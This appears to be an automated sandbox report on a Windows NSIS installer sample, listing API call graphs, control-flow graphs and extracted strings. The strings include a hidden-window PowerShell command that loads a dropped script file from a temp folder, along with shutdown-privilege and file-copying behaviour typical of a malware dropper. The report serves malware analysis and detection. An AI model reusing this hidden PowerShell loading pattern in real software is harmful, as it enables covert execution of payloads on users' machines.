lstrlenW 4505 4043b1 WideCharToMultiByte 4504->4505 4506 4043af 4504->4506 4506->4505 4507 401491 4508 4052dd 25 API calls 4507->4508 4509 401498 4508->4509 3588 402095 3589 402bbf 18 API calls 3588->3589 3590 40209c 3589->3590 3591 402bbf 18 API calls 3590->3591 3592 4020a6 3591->3592 3593 402bbf 18 API calls 3592->3593 3594 4020b0 3593->3594 3595 402bbf 18 API calls 3594->3595 3596 4020ba 3595->3596 3597 402bbf 18 API calls 3596->3597 3599 4020c4 3597->3599 3598 402103 CoCreateInstance 3603 402122 3598->3603 3599->3598 3600 402bbf 18 API calls 3599->3600 3600->3598 3601 401423 25 API calls 3602 4021e1 3601->3602 3603->3601 3603->3602 4517 401a15 4518 402bbf 18 API calls 4517->4518 4519 401a1e ExpandEnvironmentStringsW 4518->4519 4520 401a32 4519->4520 4521 401a45 4519->4521 4520->4521 4522 401a37 lstrcmpW 4520->4522 4522->4521 4523 402515 4524 402bbf 18 API calls 4523->4524 4525 40251c 4524->4525 4528 405d53 GetFileAttributesW CreateFileW 4525->4528 4527 402528 4528->4527 4529 401b16 4530 402bbf 18 API calls 4529->4530 4531 401b1d 4530->4531 4532 402ba2 18 API calls 4531->4532 4533 401b26 wsprintfW 4532->4533 4534 402a4c 4533->4534 4535 404696 4536 4046a6 4535->4536 4537 4046cc 4535->4537 4538 404242 19 API calls 4536->4538 4539 4042a9 8 API calls 4537->4539 4540 4046b3 SetDlgItemTextW 4538->4540 4541 4046d8 4539->4541 4540->4537 4542 40159b 4543 402bbf 18 API calls 4542->4543 4544 4015a2 SetFileAttributesW 4543->4544 4545 4015b4 4544->4545 3890 40541c 3891 4055c6 3890->3891 3892 40543d GetDlgItem GetDlgItem GetDlgItem 3890->3892 3894 4055f7 3891->3894 3895 4055cf GetDlgItem CreateThread CloseHandle 3891->3895 3935 404277 SendMessageW 3892->3935 3897 405622 3894->3897 3898 405647 3894->3898 3899 40560e ShowWindow ShowWindow 3894->3899 3895->3894 3938 4053b0 5 API calls 3895->3938 3896 4054ad 3901 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3896->3901 3900 405682 3897->3900 3903 405636 3897->3903 3904 40565c ShowWindow 3897->3904 3905 4042a9 8 API calls 3898->3905 3937 404277 SendMessageW 3899->3937 3900->3898 3910 405690 SendMessageW 3900->3910 3908 405522 3901->3908 3909 405506 SendMessageW SendMessageW 3901->3909 3911 40421b SendMessageW 3903->3911 3906 40567c 3904->3906 3907 40566e 3904->3907 3912 405655 3905->3912 3914 40421b SendMessageW 3906->3914 3913 4052dd 25 API calls 3907->3913 3915 405535 3908->3915 3916 405527 SendMessageW 3908->3916 3909->3908 3910->3912 3917 4056a9 CreatePopupMenu 3910->3917 3911->3898 3913->3906 3914->3900 3919 404242 19 API calls 3915->3919 3916->3915 3918 4061a0 18 API calls 3917->3918 3920 4056b9 AppendMenuW 3918->3920 3921 405545 3919->3921 3922 4056d6 GetWindowRect 3920->3922 3923 4056e9 TrackPopupMenu 3920->3923 3924 405582 GetDlgItem SendMessageW 3921->3924 3925 40554e ShowWindow 3921->3925 3922->3923 3923->3912 3927 405704 3923->3927 3924->3912 3926 4055a9 SendMessageW SendMessageW 3924->3926 3928 405571 3925->3928 3929 405564 ShowWindow 3925->3929 3926->3912 3930 405720 SendMessageW 3927->3930 3936 404277 SendMessageW 3928->3936 3929->3928 3930->3930 3931 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3930->3931 3933 405762 SendMessageW 3931->3933 3933->3933 3934 40578b GlobalUnlock SetClipboardData CloseClipboard 3933->3934 3934->3912 3935->3896 3936->3924 3937->3897 4546 401f1d 4547 402bbf 18 API calls 4546->4547 4548 401f24 4547->4548 4549 406558 5 API calls 4548->4549 4550 401f33 4549->4550 4551 401fb7 4550->4551 4552 401f4f GlobalAlloc 4550->4552 4552->4551 4553 401f63 4552->4553 4554 406558 5 API calls 4553->4554 4555 401f6a 4554->4555 4556 406558 5 API calls 4555->4556 4557 401f74 4556->4557 4557->4551 4561 4060c5 wsprintfW 4557->4561 4559 401fa9 4562 4060c5 wsprintfW 4559->4562 4561->4559 4562->4551 4563 40229d 4564 4022a5 4563->4564 4565 4022ab 4563->4565 4566 402bbf 18 API calls 4564->4566 4567 4022b9 4565->4567 4568 402bbf 18 API calls 4565->4568 4566->4565 4569 402bbf 18 API calls 4567->4569 4571 4022c7 4567->4571 4568->4567 4569->4571 4570 402bbf 18 API calls 4572 4022d0 WritePrivateProfileStringW 4570->4572 4571->4570 3939 40249e 3940 402cc9 19 API calls 3939->3940 3941 4024a8 3940->3941 3942 402ba2 18 API calls 3941->3942 3943 4024b1 3942->3943 3944 40281e 3943->3944 3945 4024d5 RegEnumValueW 3943->3945 3946 4024c9 RegEnumKeyW 3943->3946 3945->3944 3947 4024ee RegCloseKey 3945->3947 3946->3947 3947->3944 4573 40149e 4574 402288 4573->4574 4575 4014ac PostQuitMessage 4573->4575 4575->4574 3949 40231f 3950 402324 3949->3950 3951 40234f 3949->3951 3953 402cc9 19 API calls 3950->3953 3952 402bbf 18 API calls 3951->3952 3955 402356 3952->3955 3954 40232b 3953->3954 3956 402335 3954->3956 3960 40236c 3954->3960 3961 402bff RegOpenKeyExW 3955->3961 3957 402bbf 18 API calls 3956->3957 3958 40233c RegDeleteValueW RegCloseKey 3957->3958 3958->3960 3962 402c93 3961->3962 3966 402c2a 3961->3966 3962->3960 3963 402c50 RegEnumKeyW 3964 402c62 RegCloseKey 3963->3964 3963->3966 3967 406558 5 API calls 3964->3967 3965 402c87 RegCloseKey 3970 402c76 3965->3970 3966->3963 3966->3964 3966->3965 3968 402bff 5 API calls 3966->3968 3969 402c72 3967->3969 3968->3966 3969->3970 3971 402ca2 RegDeleteKeyW 3969->3971 3970->3962 3971->3970 4576 401ca3 4577 402ba2 18 API calls 4576->4577 4578 401ca9 IsWindow 4577->4578 4579 401a05 4578->4579 4580 402a27 SendMessageW 4581 402a41 InvalidateRect 4580->4581 4582 402a4c 4580->4582 4581->4582 3442 40242a 3453 402cc9 3442->3453 3444 402434 3445 402bbf 18 API calls 3444->3445 3446 40243d 3445->3446 3447 402448 RegQueryValueExW 3446->3447 3448 40281e 3446->3448 3449 402468 3447->3449 3450 40246e RegCloseKey 3447->3450 3449->3450 3457 4060c5 wsprintfW 3449->3457 3450->3448 3454 402bbf 18 API calls 3453->3454 3455 402ce2 3454->3455 3456 402cf0 RegOpenKeyExW 3455->3456 3456->3444 3457->3450 4590 40172d 4591 402bbf 18 API calls 4590->4591 4592 401734 SearchPathW 4591->4592 4593 40174f 4592->4593 4594 404a33 4595 404a43 4594->4595 4596 404a5f 4594->4596 4605 4058a7 GetDlgItemTextW 4595->4605 4598 404a92 4596->4598 4599 404a65 SHGetPathFromIDListW 4596->4599 4600 404a7c SendMessageW 4599->4600 4601 404a75 4599->4601 4600->4598 4603 40140b 2 API calls 4601->4603 4602 404a50 SendMessageW 4602->4596 4603->4600 4605->4602 4606 4027b4 4607 4027ba 4606->4607 4608 4027c2 FindClose 4607->4608 4609 402a4c 4607->4609 4608->4609 3604 4033b6 SetErrorMode GetVersion 3605 4033eb 3604->3605 3606 4033f1 3604->3606 3607 406558 5 API calls 3605->3607 3692 4064e8 GetSystemDirectoryW 3606->3692 3607->3606 3609 403407 lstrlenA 3609->3606 3610 403417 3609->3610 3695 406558 GetModuleHandleA 3610->3695 3613 406558 5 API calls 3614 403426 #17 OleInitialize SHGetFileInfoW 3613->3614 3701 40617e lstrcpynW 3614->3701 3616 403463 GetCommandLineW 3702 40617e lstrcpynW 3616->3702 3618 403475 GetModuleHandleW 3619 40348d 3618->3619 3620 405b5f CharNextW 3619->3620 3621 40349c CharNextW 3620->3621 3622 4035c6 GetTempPathW 3621->3622 3631 4034b5 3621->3631 3703 403385 3622->3703 3624 4035de 3625 4035e2 GetWindowsDirectoryW lstrcatW 3624->3625 3626 403638 DeleteFileW 3624->3626 3628 403385 12 API calls 3625->3628 3713 402e41 GetTickCount GetModuleFileNameW 3626->3713 3632 4035fe 3628->3632 3629 405b5f CharNextW 3629->3631 3630 40364c 3633 403703 ExitProcess CoUninitialize 3630->3633 3636 4036ef 3630->3636 3641 405b5f CharNextW 3630->3641 3631->3629 3635 4035af 3631->3635 3639 4035b1 3631->3639 3632->3626 3634 403602 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3632->3634 3637 403839 3633->3637 3638 403719 3633->3638 3640 403385 12 API calls 3634->3640 3635->3622 3743 4039c7 3636->3743 3645 403841 GetCurrentProcess OpenProcessToken 3637->3645 3646 4038bd ExitProcess 3637->3646 3644 4058c3 MessageBoxIndirectW 3638->3644 3799 40617e lstrcpynW 3639->3799 3647 403630 3640->3647 3658 40366b 3641->3658 3650 403727 ExitProcess 3644->3650 3651 403859 LookupPrivilegeValueW AdjustTokenPrivileges 3645->3651 3652 40388d 3645->3652 3647->3626 3647->3633 3648 4036ff 3648->3633 3651->3652 3653 406558 5 API calls 3652->3653 3654 403894 3653->3654 3657 4038a9 ExitWindowsEx 3654->3657 3661 4038b6 3654->3661 3655 4036c9 3660 405c3a 18 API calls 3655->3660 3656 40372f 3802 405846 3656->3802 3657->3646 3657->3661 3658->3655 3658->3656 3663 4036d5 3660->3663 3664 40140b 2 API calls 3661->3664 3663->3633 3800 40617e lstrcpynW 3663->3800 3664->3646 3665 403750 lstrcatW lstrcmpiW 3665->3633 3668 40376c 3665->3668 3666 403745 lstrcatW 3666->3665 3670 403771 3668->3670 3671 403778 3668->3671 3669 4036e4 3801 40617e lstrcpynW 3669->3801 3805 4057ac CreateDirectoryW 3670->3805 3810 405829 CreateDirectoryW 3671->3810 3676 40377d SetCurrentDirectoryW 3677 403798 3676->3677 3678 40378d 3676->3678 3814 40617e lstrcpynW 3677->3814 3813 40617e lstrcpynW 3678->3813 3681 4061a0 18 API calls 3682 4037d7 DeleteFileW 3681->3682 3683 4037e4 CopyFileW 3682->3683 3689 4037a6 3682->3689 3683->3689 3684 40382d 3686 40601f 38 API calls 3684->3686 3685 40601f 38 API calls 3685->3689 3687 403834 3686->3687 3687->3633 3688 4061a0 18 API calls 3688->3689 3689->3681 3689->3684 3689->3685 3689->3688 3690 40585e 2 API calls 3689->3690 3691 403818 CloseHandle 3689->3691 3690->3689 3691->3689 3693 40650a wsprintfW LoadLibraryExW 3692->3693 3693->3609 3696 406574 3695->3696 3697 40657e GetProcAddress 3695->3697 3698 4064e8 3 API calls 3696->3698 3699 40341f 3697->3699 3700 40657a 3698->3700 3699->3613 3700->3697 3700->3699 3701->3616 3702->3618 3704 406412 5 API calls 3703->3704 3706 403391 3704->3706 3705 40339b 3705->3624 3706->3705 3707 405b32 3 API calls 3706->3707 3708 4033a3 3707->3708 3709 405829 2 API calls 3708->3709 3710 4033a9 3709->3710 3815 405d82 3710->3815 3819 405d53 GetFileAttributesW CreateFileW 3713->3819 3715 402e84 3742 402e91 3715->3742 3820 40617e lstrcpynW 3715->3820 3717 402ea7 3718 405b7e 2 API calls 3717->3718 3719 402ead 3718->3719 3821 40617e lstrcpynW 3719->3821 3721 402eb8 GetFileSize 3722 402fb9 3721->3722 3740 402ecf 3721->3740 3723 402d9f 33 API calls 3722->3723 3725 402fc0 3723->3725 3724 403358 ReadFile 3724->3740 3727 402ffc GlobalAlloc 3725->3727 3725->3742 3823 40336e SetFilePointer 3725->3823 3726 403054 3729 402d9f 33 API calls 3726->3729 3728 403013 3727->3728 3734 405d82 2 API calls 3728->3734 3729->3742 3731 402fdd 3732 403358 ReadFile 3731->3732 3735 402fe8 3732->3735 3733 402d9f 33 API calls 3733->3740 3736 403024 CreateFileW 3734->3736 3735->3727 3735->3742 3737 40305e 3736->3737 3736->3742 3822 40336e SetFilePointer 3737->3822 3739 40306c 3741 4030e7 45 API calls 3739->3741 3740->3722 3740->3724 3740->3726 3740->3733 3740->3742 3741->3742 3742->3630 3744 406558 5 API calls 3743->3744 3745 4039db 3744->3745 3746 4039e1 3745->3746 3747 4039f3 3745->3747 3840 4060c5 wsprintfW 3746->3840 3748 40604b 3 API calls 3747->3748 3749 403a23 3748->3749 3750 403a42 lstrcatW 3749->3750 3752 40604b 3 API calls 3749->3752 3753 4039f1 3750->3753 3752->3750 3824 403c9d 3753->3824 3756 405c3a 18 API calls 3757 403a74 3756->3757 3758 403b08 3757->3758 3760 40604b 3 API calls 3757->3760 3759 405c3a 18 API calls 3758->3759 3761 403b0e 3759->3761 3762 403aa6 3760->3762 3763 403b1e LoadImageW 3761->3763 3766 4061a0 18 API calls 3761->3766 3762->3758 3769 403ac7 lstrlenW 3762->3769 3773 405b5f CharNextW 3762->3773 3764 403bc4 3763->3764 3765 403b45 RegisterClassW 3763->3765 3768 40140b 2 API calls 3764->3768 3767 403b7b SystemParametersInfoW CreateWindowExW 3765->3767 3798 403bce 3765->3798 3766->3763 3767->3764 3772 403bca 3768->3772 3770 403ad5 lstrcmpiW 3769->3770 3771 403afb 3769->3771 3770->3771 3775 403ae5 GetFileAttributesW 3770->3775 3776 405b32 3 API calls 3771->3776 3778 403c9d 19 API calls 3772->3778 3772->3798 3774 403ac4 3773->3774 3774->3769 3777 403af1 3775->3777 3779 403b01 3776->3779 3777->3771 3780 405b7e 2 API calls 3777->3780 3781 403bdb 3778->3781 3841 40617e lstrcpynW 3779->3841 3780->3771 3783 403be7 ShowWindow 3781->3783 3784 403c6a 3781->3784 3786 4064e8 3 API calls 3783->3786 3833 4053b0 OleInitialize 3784->3833 3788 403bff 3786->3788 3787 403c70 3789 403c74 3787->3789 3790 403c8c 3787->3790 3791 403c0d GetClassInfoW 3788->3791 3795 4064e8 3 API calls 3788->3795 3797 40140b 2 API calls 3789->3797 3789->3798 3794 40140b 2 API calls 3790->3794 3792 403c21 GetClassInfoW RegisterClassW 3791->3792 3793 403c37 DialogBoxParamW 3791->3793 3792->3793 3796 40140b 2 API calls 3793->3796 3794->3798 3795->3791 3796->3798 3797->3798 3798->3648 3799->3635 3800->3669 3801->3636 3803 406558 5 API calls 3802->3803 3804 403734 lstrcatW 3803->3804 3804->3665 3804->3666 3806 4057fd GetLastError 3805->3806 3807 403776 3805->3807 3806->3807 3808 40580c SetFileSecurityW 3806->3808 3807->3676 3808->3807 3809 405822 GetLastError 3808->3809 3809->3807 3811 405839 3810->3811 3812 40583d GetLastError 3810->3812 3811->3676 3812->3811 3813->3677 3814->3689 3816 405d8f GetTickCount GetTempFileNameW 3815->3816 3817 4033b4 3816->3817 3818 405dc5 3816->3818 3817->3624 3818->3816 3818->3817 3819->3715 3820->3717 3821->3721 3822->3739 3823->3731 3825 403cb1 3824->3825 3842 4060c5 wsprintfW 3825->3842 3827 403d22 3828 4061a0 18 API calls 3827->3828 3829 403d2e SetWindowTextW 3828->3829 3830 403a52 3829->3830 3831 403d4a 3829->3831 3830->3756 3831->3830 3832 4061a0 18 API calls 3831->3832 3832->3831 3834 40428e SendMessageW 3833->3834 3835 4053d3 3834->3835 3838 401389 2 API calls 3835->3838 3839 4053fa 3835->3839 3836 40428e SendMessageW 3837 40540c CoUninitialize 3836->3837 3837->3787 3838->3835 3839->3836 3840->3753 3841->3758 3842->3827 4610 401b37 4611 401b44 4610->4611 4612 401b88 4610->4612 4615 401bcd 4611->4615 4620 401b5b 4611->4620 4613 401bb2 GlobalAlloc 4612->4613 4614 401b8d 4612->4614 4617 4061a0 18 API calls 4613->4617 4628 402288 4614->4628 4631 40617e lstrcpynW 4614->4631 4616 4061a0 18 API calls 4615->4616 4615->4628 4618 402282 4616->4618 4617->4615 4623 4058c3 MessageBoxIndirectW 4618->4623 4629 40617e lstrcpynW 4620->4629 4621 401b9f GlobalFree 4621->4628 4623->4628 4624 401b6a 4630 40617e lstrcpynW 4624->4630 4626 401b79 4632 40617e lstrcpynW 4626->4632 4629->4624 4630->4626 4631->4621 4632->4628 4633 402537 4634 402562 4633->4634 4635 40254b 4633->4635 4637 402596 4634->4637 4638 402567 4634->4638 4636 402ba2 18 API calls 4635->4636 4645 402552 4636->4645 4640 402bbf 18 API calls 4637->4640 4639 402bbf 18 API calls 4638->4639 4641 40256e WideCharToMultiByte lstrlenA 4639->4641 4642 40259d lstrlenW 4640->4642 4641->4645 4642->4645 4643 4025e0 4644 405e05 WriteFile 4644->4643 4645->4643 4646 405e34 5 API calls 4645->4646 4647 4025ca 4645->4647 4646->4647 4647->4643 4647->4644 4648 4014b8 4649 4014be 4648->4649 4650 401389 2 API calls 4649->4650 4651 4014c6 4650->4651 3849 4015b9 3850 402bbf 18 API calls 3849->3850 3851 4015c0 3850->3851 3852 405bdd 4 API calls 3851->3852 3853 4015c9 3852->3853 3854 401629 3853->3854 3855 405b5f CharNextW 3853->3855 3862 405829 2 API calls 3853->3862 3863 405846 5 API calls 3853->3863 3865 4015f2 3853->3865 3867 40160f GetFileAttributesW 3853->3867 3856 40165b 3854->3856 3857 40162e 3854->3857 3855->3853 3860 401423 25 API calls 3856->3860 3858 401423 25 API calls 3857->3858 3859 401635 3858->3859 3869 40617e lstrcpynW 3859->3869 3866 401653 3860->3866 3862->3853 3863->3853 3864 401642 SetCurrentDirectoryW 3864->3866 3865->3853 3868 4057ac 4 API calls 3865->3868 3867->3853 3868->3865 3869->3864 4659 40293b 4660 402ba2 18 API calls 4659->4660 4661 402941 4660->4661 4662 40281e 4661->4662 4663 402964 4661->4663 4664 40297d 4661->4664 4665 402969 4663->4665 4666 40297a 4663->4666 4667 402993 4664->4667 4668 402987 4664->4668 4673 40617e lstrcpynW 4665->4673 4674 4060c5 wsprintfW 4666->4674 4669 4061a0 18 API calls 4667->4669 4670 402ba2 18 API calls 4668->4670 4669->4662 4670->4662 4673->4662 4674->4662

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 4033b6-4033e9 SetErrorMode GetVersion 1 4033eb-4033f3 call 406558 0->1 2 4033fc 0->2 1->2 8 4033f5 1->8 4 403401-403415 call 4064e8 lstrlenA 2->4 9 403417-40348b call 406558 * 2 #17 OleInitialize SHGetFileInfoW call 40617e GetCommandLineW call 40617e GetModuleHandleW 4->9 8->2 18 403495-4034af call 405b5f CharNextW 9->18 19 40348d-403494 9->19 22 4034b5-4034bb 18->22 23 4035c6-4035e0 GetTempPathW call 403385 18->23 19->18 25 4034c4-4034c8 22->25 26 4034bd-4034c2 22->26 32 4035e2-403600 GetWindowsDirectoryW lstrcatW call 403385 23->32 33 403638-403652 DeleteFileW call 402e41 23->33 27 4034ca-4034ce 25->27 28 4034cf-4034d3 25->28 26->25 26->26 27->28 30 403592-40359f call 405b5f 28->30 31 4034d9-4034df 28->31 46 4035a1-4035a2 30->46 47 4035a3-4035a9 30->47 35 4034e1-4034e9 31->35 36 4034fa-403533 31->36 32->33 52 403602-403632 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 32->52 48 403703-403713 ExitProcess CoUninitialize 33->48 49 403658-40365e 33->49 41 4034f0 35->41 42 4034eb-4034ee 35->42 43 403550-40358a 36->43 44 403535-40353a 36->44 41->36 42->36 42->41 43->30 51 40358c-403590 43->51 44->43 50 40353c-403544 44->50 46->47 47->22 53 4035af 47->53 56 403839-40383f 48->56 57 403719-403729 call 4058c3 ExitProcess 48->57 54 4036f3-4036fa call 4039c7 49->54 55 403664-40366f call 405b5f 49->55 58 403546-403549 50->58 59 40354b 50->59 51->30 60 4035b1-4035bf call 40617e 51->60 52->33 52->48 62 4035c4 53->62 71 4036ff 54->71 78 403671-4036a6 55->78 79 4036bd-4036c7 55->79 67 403841-403857 GetCurrentProcess OpenProcessToken 56->67 68 4038bd-4038c5 56->68 58->43 58->59 59->43 60->62 62->23 75 403859-403887 LookupPrivilegeValueW AdjustTokenPrivileges 67->75 76 40388d-40389b call 406558 67->76 72 4038c7 68->72 73 4038cb-4038cf ExitProcess 68->73 71->48 72->73 75->76 84 4038a9-4038b4 ExitWindowsEx 76->84 85 40389d-4038a7 76->85 81 4036a8-4036ac 78->81 82 4036c9-4036d7 call 405c3a 79->82 83 40372f-403743 call 405846 lstrcatW 79->83 86 4036b5-4036b9 81->86 87 4036ae-4036b3 81->87 82->48 94 4036d9-4036ef call 40617e * 2 82->94 97 403750-40376a lstrcatW lstrcmpiW 83->97 98 403745-40374b lstrcatW 83->98 84->68 90 4038b6-4038b8 call 40140b 84->90 85->84 85->90 86->81 91 4036bb 86->91 87->86 87->91 90->68 91->79 94->54 97->48 100 40376c-40376f 97->100 98->97 102 403771-403776 call 4057ac 100->102 103 403778 call 405829 100->103 109 40377d-40378b SetCurrentDirectoryW 102->109 103->109 110 403798-4037c1 call 40617e 109->110 111 40378d-403793 call 40617e 109->111 115 4037c6-4037e2 call 4061a0 DeleteFileW 110->115 111->110 118 403823-40382b 115->118 119 4037e4-4037f4 CopyFileW 115->119 118->115 121 40382d-403834 call 40601f 118->121 119->118 120 4037f6-403816 call 40601f call 4061a0 call 40585e 119->120 120->118 130 403818-40381f CloseHandle 120->130 121->48 130->118
            APIs
            • SetErrorMode.KERNELBASE ref: 004033D9
            • GetVersion.KERNEL32 ref: 004033DF
            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
            • #17.COMCTL32(00000007,00000009), ref: 0040342B
            • OleInitialize.OLE32(00000000), ref: 00403432
            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
            • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000000), ref: 00403476
            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000020), ref: 0040349D
              • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
              • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
            • DeleteFileW.KERNELBASE(1033), ref: 0040363D
              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
            • ExitProcess.KERNEL32(?), ref: 00403703
            • CoUninitialize.COMBASE(?), ref: 00403708
            • ExitProcess.KERNEL32 ref: 00403729
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000000,?), ref: 0040373C
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000000,?), ref: 0040374B
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000000,?), ref: 00403756
            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000000,?), ref: 00403762
            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr,?), ref: 004037D8
            • CopyFileW.KERNEL32(00438800,00420EE8,00000001), ref: 004037EC
            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
            • OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
            • AdjustTokenPrivileges.ADVAPI32 ref: 00403887
            • ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
            • ExitProcess.KERNEL32 ref: 004038CF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\alkylsulfater$C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr$~nsu
            • API String ID: 354199918-3953114357
            • Opcode ID: f1899df32a54b66baf21601afc593779273bb505f21a9a634078a50c63fc12b9
            • Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
            • Opcode Fuzzy Hash: f1899df32a54b66baf21601afc593779273bb505f21a9a634078a50c63fc12b9
            • Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 131 40541c-405437 132 4055c6-4055cd 131->132 133 40543d-405504 GetDlgItem * 3 call 404277 call 404b7a GetClientRect GetSystemMetrics SendMessageW * 2 131->133 135 4055f7-405604 132->135 136 4055cf-4055f1 GetDlgItem CreateThread CloseHandle 132->136 153 405522-405525 133->153 154 405506-405520 SendMessageW * 2 133->154 138 405622-40562c 135->138 139 405606-40560c 135->139 136->135 143 405682-405686 138->143 144 40562e-405634 138->144 141 405647-405650 call 4042a9 139->141 142 40560e-40561d ShowWindow * 2 call 404277 139->142 157 405655-405659 141->157 142->138 143->141 146 405688-40568e 143->146 148 405636-405642 call 40421b 144->148 149 40565c-40566c ShowWindow 144->149 146->141 155 405690-4056a3 SendMessageW 146->155 148->141 151 40567c-40567d call 40421b 149->151 152 40566e-405677 call 4052dd 149->152 151->143 152->151 160 405535-40554c call 404242 153->160 161 405527-405533 SendMessageW 153->161 154->153 162 4057a5-4057a7 155->162 163 4056a9-4056d4 CreatePopupMenu call 4061a0 AppendMenuW 155->163 170 405582-4055a3 GetDlgItem SendMessageW 160->170 171 40554e-405562 ShowWindow 160->171 161->160 162->157 168 4056d6-4056e6 GetWindowRect 163->168 169 4056e9-4056fe TrackPopupMenu 163->169 168->169 169->162 173 405704-40571b 169->173 170->162 172 4055a9-4055c1 SendMessageW * 2 170->172 174 405571 171->174 175 405564-40556f ShowWindow 171->175 172->162 176 405720-40573b SendMessageW 173->176 177 405577-40557d call 404277 174->177 175->177 176->176 178 40573d-405760 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 176->178 177->170 180 405762-405789 SendMessageW 178->180 180->180 181 40578b-40579f GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
            APIs
            • GetDlgItem.USER32(?,00000403), ref: 0040547A
            • GetDlgItem.USER32(?,000003EE), ref: 00405489
            • GetClientRect.USER32(?,?), ref: 004054C6
            • GetSystemMetrics.USER32(00000002), ref: 004054CD
            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
